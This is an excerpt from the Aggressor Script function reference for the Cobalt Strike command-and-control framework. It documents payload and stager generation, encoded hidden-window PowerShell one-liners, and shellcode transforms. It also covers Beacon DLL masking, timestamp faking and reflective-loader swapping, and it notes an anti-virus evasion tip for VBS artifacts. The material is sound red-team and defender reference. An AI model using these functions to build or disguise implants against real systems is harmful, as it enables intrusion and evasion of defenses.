Functions
This is a list of Aggressor Script’s functions part 4 (3-3).
payload_local
Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session’s metadata.
Arguments
$1- the parent Beacon session ID
$2- the listener name
$3- x86|x64 the architecture of the payload
$4- exit method: ‘thread’ (leave the thread when done) or ‘process’ (exit the process when done). Use ‘thread’ if injecting into an existing process.
Returns
A scalar containing position-independent code for the specified listener.
Example
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
pe_insert_rich_header
Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.
Arguments
$1- Beacon DLL content
$2- Rich header
Returns
Updated DLL Content
Note
The rich header length should be on a 4 byte boundary for subsequent checksum calculations.
Example
# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);
pe_mask
Mask data in the Beacon DLL Content based on position and length.
Arguments
$1- Beacon DLL content
$2- Start location
$3- Length to mask
$4- Byte value mask key (int)
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {
local('$temp_dll, $start, $length, $maskkey');
local('%pemap');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_en = values(%pemap, @("Export.Name."));
@val_en = values(%pemap, @("Export.Name."));
if (size(@val_en) != 1) {
warn("Unexpected size of export name value array: " . size(@val_en));
} else {
warn("Current export value: " . @val_en[0]);
}
if (size(@loc_en) != 1) {
warn("Unexpected size of export location array: " . size(@loc_en));
} else {
warn("Current export name location: " . @loc_en[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$start = parseNumber(@loc_en[0], 10);
$length = 4;
$maskkey = 22;
# -------------------------------------
# mask some data in a dll
# -------------------------------------
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
$temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
# $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_mask_section
Mask data in the Beacon DLL Content based on position and length.
Arguments
$1- Beacon DLL content
$2- Section name
$3- Byte value mask key (int)
Returns
Updated DLL Content.
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {
local('$temp_dll, $section_name, $maskkey');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Set parameters
# -------------------------------------
$section_name = ".text";
$maskkey = 23;
# -------------------------------------
# mask a section in a dll
# -------------------------------------
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
$temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
# $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_mask_string
Mask a string in the Beacon DLL Content based on position.
Arguments
$1- Beacon DLL content
$2- Start location
$3- Byte value mask key (int)
Returns
Updated DLL Content
Example
# $1 = Beacon DLL content
===========================================================================
sub demo_pe_mask_string {
local('$temp_dll, $location, $length, $maskkey');
local('%pemap');
local('@loc);
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.0."));
if (size(@loc) != 1) {
warn("Unexpected size of section name location array: " . size(@loc));
} else {
warn("Current section name location: " . @loc[0]);
}
# -------------------------------------
# Set parameters
# -------------------------------------
$location = @loc[0];
$length = 5;
$maskkey = 23;
# -------------------------------------
# pe_mask_string (mask a string in a dll)
# -------------------------------------
# warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
$temp_dll = pe_mask_string($temp_dll, $location, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# un-mask (running the same mask a second time should "un-mask")
# we are unmasking the length of the string and the null character
# (This would normally be done by the reflective loader)
# -------------------------------------
# warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
# $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_patch_code
Patch code in the Beacon DLL Content based on find/replace in ‘.text’ section’.
Arguments
$1- Beacon DLL content
$2- byte array to find for resolve offset
$3- byte array place at resolved offset (overwrite data)
Returns
Updated DLL Content
Example
sub demo_pe_patch_code {
local('$temp_dll, $findme, $replacement');
$temp_dll = $1;
# ====== simple text values ======
$findme = "abcABC123";
$replacement = "123ABCabc";
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
# ====== byte array as a hex string ======
$findme = "\x01\x02\x03\xfc\xfe\xff";
$replacement = "\x01\x02\x03\xfc\xfe\xff";
# warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
$temp_dll = pe_patch_code($temp_dll, $findme, $replacement);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_remove_rich_header
Remove the rich header from Beacon DLL Content.
Arguments
$1- Beacon DLL content
Returns
Updated DLL Content
Example
# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);
pe_set_compile_time_with_long
Set the compile time in the Beacon DLL Content.
Arguments
$1- Beacon DLL content
$2- Compile Time (as a long in milliseconds)
Returns
Updated DLL Content
Example
# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);
pe_set_compile_time_with_string
Set the compile time in the Beacon DLL Content.
Arguments
$1- Beacon DLL content
$2- Compile Time (as a string)
Returns
Updated DLL Content
Example
# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);
pe_set_export_name
Set the export name in the Beacon DLL Content.
Arguments
$1- Beacon DLL content
Returns
Updated DLL Content
Note
The name must exist in the string table.
Example
# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);
$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);
pe_set_long
Places a long value at a specified location.
Arguments
$1- Beacon DLL content
$2- Location
$3- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {
local('$temp_dll, $int_offset, $long_value');
local('%pemap');
local('@loc_cs, @val_cs');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_cs = values(%pemap, @("CheckSum.<location>"));
@val_cs = values(%pemap, @("CheckSum.<value>"));
if (size(@val_cs) != 1) {
warn("Unexpected size of checksum value array: " . size(@val_cs));
} else {
warn("Current checksum value: " . @val_cs[0]);
}
if (size(@loc_cs) != 1) {
warn("Unexpected size of checksum location array: " . size(@loc_cs));
} else {
warn("Current checksum location: " . @loc_cs[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$int_offset = parseNumber(@loc_cs[0], 10);
$long_value = 98765;
# -------------------------------------
# pe_set_long (set a long value)
# -------------------------------------
# warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
$temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_short
Places a short value at a specified location.
Arguments
$1- Beacon DLL content
$2- Location
$3- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {
local('$temp_dll, $int_offset, $short_value');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @(".text.NumberOfRelocations."));
@val = values(%pemap, @(".text.NumberOfRelocations."));
if (size(@val) != 1) {
warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
} else {
warn("Current .text.NumberOfRelocations value: " . @val[0]);
}
if (size(@loc) != 1) {
warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
} else {
warn("Current .text.NumberOfRelocations location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$int_offset = parseNumber(@loc[0], 10);
$short_value = 128;
# -------------------------------------
# pe_set_short (set a short value)
# -------------------------------------
# warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
$temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_string
Places a string value at a specified location.
Arguments
$1- Beacon DLL content
$2- Start location
$3- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {
local('$temp_dll, $location, $value');
local('%pemap');
local('@loc_en, @val_en');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc_en = values(%pemap, @("Export.Name."));
@val_en = values(%pemap, @("Export.Name."));
if (size(@val_en) != 1) {
warn("Unexpected size of export name value array: " . size(@val_en));
} else {
warn("Current export value: " . @val_en[0]);
}
if (size(@loc_en) != 1) {
warn("Unexpected size of export location array: " . size(@loc_en));
} else {
warn("Current export name location: " . @loc_en[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$location = parseNumber(@loc_en[0], 10);
$value = "BEECON.DLL";
# -------------------------------------
# pe_set_string (set a string value)
# -------------------------------------
# warn("pe_set_string(dll, " . $location . ", " . $value . ")");
$temp_dll = pe_set_string($temp_dll, $location, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_stringz
Places a string value at a specified location and adds a zero terminator.
Arguments
$1- Beacon DLL content
$2- Start location
$3- String to set
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {
local('$temp_dll, $offset, $value');
local('%pemap');
local('@loc');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.0."));
if (size(@loc) != 1) {
warn("Unexpected size of section name location array: " . size(@loc));
} else {
warn("Current section name location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$offset = parseNumber(@loc[0], 10);
$value = "abc";
# -------------------------------------
# pe_set_stringz
# -------------------------------------
# warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
$temp_dll = pe_set_stringz($temp_dll, $offset, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# Set parameters
# -------------------------------------
# $offset = parseNumber(@loc[0], 10);
# $value = ".tex";
# -------------------------------------
# pe_set_string (set a string value)
# -------------------------------------
# warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
# $temp_dll = pe_set_string($temp_dll, $offset, $value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_set_value_at
Sets a long value based on the location resolved by a name from the PE Map (see pedump).
Arguments
$1- Beacon DLL content
$2- Name of location field
$3- Value
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {
local('$temp_dll, $name, $long_value, $date');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
# %pemap = pedump($temp_dll);
# @loc = values(%pemap, @("SizeOfImage."));
# @val = values(%pemap, @("SizeOfImage."));
# if (size(@val) != 1) {
# warn("Unexpected size of SizeOfImage. value array: " . size(@val));
# } else {
# warn("Current SizeOfImage. value: " . @val[0]);
# }
# if (size(@loc) != 1) {
# warn("Unexpected size of SizeOfImage location array: " . size(@loc));
# } else {
# warn("Current SizeOfImage. location: " . @loc[0]);
# }
# -------------------------------------
# Set parameters
# -------------------------------------
$name = "SizeOfImage";
$long_value = 22334455;
# -------------------------------------
# pe_set_value_at (set a long value at the location resolved by name)
# -------------------------------------
# $1 = DLL (byte array)
# $2 = name (string)
# $3 = value (long)
# -------------------------------------
warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
$temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# set it back?
# -------------------------------------
# warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
# $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_stomp
Set a string to null characters. Start at a specified location and sets all characters to null until a null string terminator is reached.
Arguments
$1- Beacon DLL content
$2- Start location
Returns
Updated DLL Content
Example
# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {
local('$temp_dll, $offset, $value, $old_name');
local('%pemap');
local('@loc, @val');
$temp_dll = $1;
# -------------------------------------
# Inspect the current DLL...
# -------------------------------------
%pemap = pedump($temp_dll);
@loc = values(%pemap, @("Sections.AddressOfName.1."));
@val = values(%pemap, @("Sections.AddressOfName.1."));
if (size(@val) != 1) {
warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
} else {
warn("Current Sections.AddressOfName.1 value: " . @val[0]);
}
if (size(@loc) != 1) {
warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
} else {
warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
}
# -------------------------------------
# Set parameters (parse number as base 10)
# -------------------------------------
$location = parseNumber(@loc[0], 10);
# -------------------------------------
# pe_stomp (stomp a string at a location)
# -------------------------------------
# warn("pe_stomp(dll, " . $location . ")");
$temp_dll = pe_stomp($temp_dll, $location);
# -------------------------------------
# Did it work?
# -------------------------------------
# dump_my_pe($temp_dll);
# -------------------------------------
# All Done! Give back edited DLL!
# -------------------------------------
return $temp_dll;
}
pe_update_checksum
Update the checksum in the Beacon DLL Content.
Arguments
$1- Beacon DLL content
Returns
Updated DLL Content
Note
This should be the last transformation performed.
Example
# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);
pedump
Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.
Arguments
$1- Beacon DLL content
Returns
A map of the parsed information. The map data is very similar to the “./peclone dump [file]” command output.
Example
# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
$a = lc($1);
$b = lc($2);
return $a cmp $b;
}
# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
local('$out $key $val %pemap @sorted_keys');
%pemap = pedump($1);
# ---------------------------------------------------
# Example listing all items from hash/map...
# ---------------------------------------------------
@sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
foreach $key (@sorted_keys)
{
$out = "$[50]key";
foreach $val (values(%pemap, @($key)))
{
$out .= " $val";
println($out);
}
}
# ---------------------------------------------------
# Example of grabbing specific items from hash/map...
# ---------------------------------------------------
local('@loc_cs @val_cs');
@loc_cs = values(%pemap, @("CheckSum.<location>"));
@val_cs = values(%pemap, @("CheckSum.<value>"));
println("");
println("My DLL CheckSum Location: " . @loc_cs);
println("My DLL CheckSum Value: " . @val_cs);
println("");
}
See also
./peclone dump [file]
pgraph
Generate the pivot graph GUI component.
Returns
The pivot graph GUI object (a javax.swing.JComponent )
Example
addVisualization("Pivot Graph", pgraph());
See also
pivots
Returns a list of SOCKS pivots from Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each pivot.
Example
printAll(pivots());
popup_clear
Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike’s default popup menu definitions.
Arguments
$1 - the popup hook to clear registered menus for
Example
popup_clear("help");
popup help {
item "My stuff!" {
show_message("This is my menu!");
}
}
powershell
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.
Returns a PowerShell one-liner to bootstrap the specified listener.
Arguments
$1- the listener name
$2- [true/false]: is this listener targeting local host?
$3- x86|x64 - the architecture of the generated stager.
Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A PowerShell one-liner to run the specified listener.
Example
println(powershell("my listener", false));
powershell_command
Returns a one-liner to run a PowerShell expression (e.g., **powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==** )
Arguments
$1- the PowerShell expression to wrap into a one-liner.
$2- will the PowerShell command run on a remote target?
Returns
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_command("2 + 2", false); println($cmd);
powershell_compress
Compresses a PowerShell script and wraps it in a script to decompress and execute it.
Arguments
$1 - the PowerShell script to compress.
Example
$script = powershell_compress("2 + 2");
powershell_encode_oneliner
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use [&powershell_command] instead.
Returns a one-liner to run a PowerShell expression (e.g., **powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==** )
Arguments
$1- the PowerShell expression to wrap into a one-liner.
Returns a powershell.exe one-liner to run the specified expression.
Example
$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);
powershell_encode_stager
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use [&artifact_general] and [&powershell_command] instead.
Returns a base64 encoded PowerShell script to run the specified shellcode
Arguments
$1- shellcode to wrap
Returns
Returns a base64 encoded PowerShell suitable for use with powershell.exe’s -enc option.
Example
$shellcode = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");
pref_get
Grabs a string value from Cobalt Strike’s preferences.
Arguments
$1- the preference name
$2- the default value [if there is no value for this preference]
Returns
A string with the preference value.
Example
$foo = pref_get("foo.string", "bar");
pref_get_list
Grabs a list value from Cobalt Strike’s preferences.
Arguments
$1- the preference name
Returns
An array with the preference values
Example
@foo = pref_get_list("foo.list");
pref_set
Set a value in Cobalt Strike’s preferences
Arguments
$1- the preference name
$2- the preference value
Example
pref_set("foo.string", "baz!");
pref_set_list
Stores a list value into Cobalt Strike’s preferences.
Arguments
$1 - the preference name
$2 - an array of values for this preference
Example
pref_set_list("foo.list", @("a", "b", "c"));
previousTab
Activate the tab that is to the left of the current tab.
Example
bind Ctrl+Left {
previousTab();
}
privmsg
Post a private message to a user in the event log
Arguments
$1 - who to send the message to
$2 - the message
Example
privmsg("raffi", "what's up man?");
prompt_confirm
Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.
Arguments
$1- text in the dialog
$2- title of the dialog
$3- a callback function. Called when the user presses yes.
Example
prompt_confirm("Do you feel lucky?", "Do you?", {
show_mesage("Ok, I got nothing");
});
prompt_directory_open
Show a directory open dialog.
Arguments
$1- title of the dialog
$2- default value
$3- true/false: allow user to select multiple folders?
$4- a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_directory_open("Choose a folder", $null, false, {
show_message("You chose: $1");
});
prompt_file_open
Show a file open dialog.
Arguments
$1- title of the dialog
$2- default value
$3- true/false: allow user to select multiple files?
$4- a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.
Example
prompt_file_open("Choose a file", $null, false, {
show_message("You chose: $1");
});
prompt_file_save
Show a file save dialog.
Arguments
$1- default value
$2- a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.
Example
prompt_file_save($null, {
local('$handle');
$handle = openf("> $+ $1");
println($handle, "I am content");
closef($handle);
});
prompt_text
Show a dialog that asks the user for text.
Arguments
$1- text in the dialog
$2- default value in the text field.
$3- a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.
Example
prompt_text("What is your name?", "Cyber Bob", {
show_mesage("Hi $1 $+ , nice to meet you!");
});
range
Generate an array of numbers based on a string description of ranges.
Arguments
$1- a string with a description of ranges
| Range | Result |
|---|---|
| 103 | The number 103 |
| 3-8 | The numbers 3, 4, 5, 6, and 7. |
| 2,4-6 | The numbers 2, 4, and 5. |
Returns
An array of numbers within the specified ranges.
Example
printAll(range("2,4-6"));
redactobject
Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.
Arguments
$1 - the ID of the post-exploitation object.
removeTab
Close the active tab
Example
bind Ctrl+D {
removeTab();
}
resetData
Reset Cobalt Strike’s data model
say
Post a public chat message to the event log.
Arguments
$1- the message
Example
say("Hello World!");
sbrowser
Generate the session browser GUI component. Shows Beacon AND SSH sessions.
Returns
The session browser GUI object (a javax.swing.JComponent )
Example
addVisualization("Session Browser", sbrowser());
See also
screenshots_funcs
Returns a list of screenshots from Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each screenshot.
Example
printAll(screenshots());
script_resource
Returns the full path to a resource that is stored relative to this script file.
Arguments
``$1 - the file to get a path for
Returns
The full path to the specified file.
Example
println(script_resource("dummy.txt"));
separator
Insert a separator into the current menu tree.
Example
popup foo {
item "Stuff" { ... }
separator();
item "Other Stuff" { ... }
}
services
Returns a list of services in Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each service.
Example
printAll(services());
setup_reflective_loader
Insert the reflective loader executable code into a beacon payload.
Arguments
$1- Original beacon executable payload.
$2- User defined Reflective Loader executable data.
Returns
The beacon executable payload updated with the user defined reflective loader. $null if there is an error.
Notes
The user defined Reflective Loader must be less than 5k.
Example
See BEACON_RDLL_GENERATE hook
# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);
shellcode
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.
Returns raw shellcode for a specific Cobalt Strike listener
Arguments
$1- the listener name
$2- true/false: is this shellcode destined for a remote target?
$3- x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = shellcode("my listener", false, "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
showVisualization
Switch Cobalt Strike visualization to a registered visualization.
Arguments
$1- the name of the visualization
Example
bind Ctrl+H {
showVisualization("Hello World");
}
See also
show_error
Shows an error message to the user in a dialog box. Use this function to relay error information.
Arguments
$1- the message text
Example
show_error("You did something bad.");
show_message
Shows a message to the user in a dialog box. Use this function to relay information.
Arguments
$1- the message text
Example
show_message("You've won a free ringtone");
site_host
Host content on Cobalt Strike’s web server
Arguments
$1- the host for this site ([&localip] is a good default)
$2- the port (e.g., 80)
$3- the URI (e.g., /foo)
$4- the content to host (as a string)
$5- the mime-type (e.g., “text/plain”)
$6- a description of the content. Shown in Attacks → Web Drive-by → Manage .
$7- use SSL or not (true or false)
Returns
The URL to this hosted site
Example
site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);
site_kill
Remove a site from Cobalt Strike’s web server
Arguments
$1- the port
$2- the URI
Example
# removes the content bound to / on port 80
site_kill(80, "/");
sites
Returns a list of sites tied to Cobalt Strike’s web server.
Returns
An array of dictionary objects with information about each registered site.
Example
printAll(sites());
ssh_command_describe
Describe an SSH command.
Returns
A string description of the SSH command.
Arguments
$1- the command
Example
println(beacon_command_describe(“sudo”));
ssh_command_detail
Get the help information for an SSH command.
Returns
A string with helpful information about an SSH command.
Arguments
$1- the command
Example
println(ssh_command_detail("sudo"));
ssh_command_register
Register help information for an SSH console command.
Arguments
$1 - the command
$2 - the short description of the command
$3 - the long-form help for the command.
Example
ssh_alis echo {
blog($1, "You typed: " . substr($1, 5));
}
ssh_command_register(
"echo",
"echo posts to the current session's log",
"Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
ssh_commands
Get a list of SSH commands.
Returns
An array of SSH commands.
Example
printAll(ssh_commands());
stager
Returns the stager for a specific Cobalt Strike listener
Arguments
$1- the listener name
$2- x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = stager("my listener", "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
stager_bind_pipe
Arguments
$1 - the listener name
Returns
A scalar containing x86 bind_pipe shellcode.
Example
# step 1. generate our stager
$stager = stager_bind_pipe("my listener");
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also
stager_bind_tcp
Arguments
$1- the listener name
$2- x86|x64 - the architecture of the stager output.
$3- the port to bind to
Returns
A scalar containing bind_tcp shellcode
Example
# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also
&artifact_general
str_chunk
Chunk a string into multiple parts
Arguments
$1- the string to chunk
$2- the maximum size of each chunk
Returns
The original string split into multiple chunks
Example
# hint... :)
else if ($1 eq "template.x86.ps1") {
local('$enc');
$enc = str_chunk(base64_encode($2), 61);
return strrep($data, '%%DATA%%', join("' + '", $enc));
}
str_decode
Convert a string of bytes to text with the specified encoding.
Arguments
$1- the string to decode
$2- the encoding to use.
Returns
The decoded text.
Example
# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");
str_encode
Convert text to byte string with the specified character encoding.
Arguments
$1- the string to encode
$2- the encoding to use
Returns
The resulting string.
Example
# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");
str_xor
Walk a string and XOR it with the provided key.
Arguments
$1- the string to mask
$2- the key to use (string)
Returns
The original string masked with the specified key.
Example
$mask = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");
sync_download
Sync a downloaded file (View → Downloads) to a local path.
Arguments
$1- the remote path to the file to sync.
$2- where to save the file locally
$3- [optional] a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.
Example
# sync all downloads
command ga {
local('$download $lpath $name $count');
foreach $count => $download (downloads()) {
($lpath, $name) = values($download, @("lpath", "name"));
sync_download($lpath, script_resource("file $+ .$count"), lambda({
println("Downloaded $1 [ $+ $name $+ ]");
}, \$name));
}
}
targets
Returns a list of host information in Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each host.
Example
printAll(targets());
tbrowser
Generate the target browser GUI component.
Returns
The target browser GUI object (a javax.swing.JComponent )
Example
addVisualization("Target Browser", tbrowser());
See also
&showVisualization
tokenToEmail
Covert a phishing token to an email address.
Arguments
``$1 - the phishing token
Returns
The email address or “unknown” if the token is not associated with an email.
Example
set PROFILER_HIT {
local('$out $app $ver $email');
$email = tokenToEmail($5);
$out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
foreach $app => $ver ($4) {
$out .= "\n\t $+ $[25]app $ver";
}
return "$out $+ \n\n";
}
transform
Transform shellcode into another format.
Arguments
$1- the shellcode to transform
$2- the transform to apply
| Type | Description |
|---|---|
| array | comma separated byte values |
| hex | Hex-encode the value |
| powershell-base64 | PowerShell.exe-friendly base64 encoder |
| vba | a VBA array() with newlines added in |
| vbs | a VBS expression that results in a string |
| veil | Veil-ready string (\x##\x##) |
Returns
The shellcode after the specified transform is applied
Example
println(transform("This is a test!", "veil"));
transform_vbs
Transform shellcode into a VBS expression that results in a string
Arguments
$1- the shellcode to transform
$2- the maximum length of a plaintext run
Notes
- Previously, Cobalt Strike would embed its stagers into VBS files as several
Chr()calls concatened into a string.- Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
- To get past this VBS limitation, Cobalt Strike opted to use
Chr()calls for non-ASCII data and runs of double-quoted strings for printable characters.- This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike’s default VBS artifacts at that time.
- If you’re looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.
Returns
The shellcode after this transform is applied
Example
println(transform_vbs("This is a test!", "3"));
tstamp
Format a time into a date/time value. This value does not include seconds.
Arguments
$1- the time [milliseconds since the UNIX epoch]
Example
println("The time is now: " . tstamp(ticks()));
See also
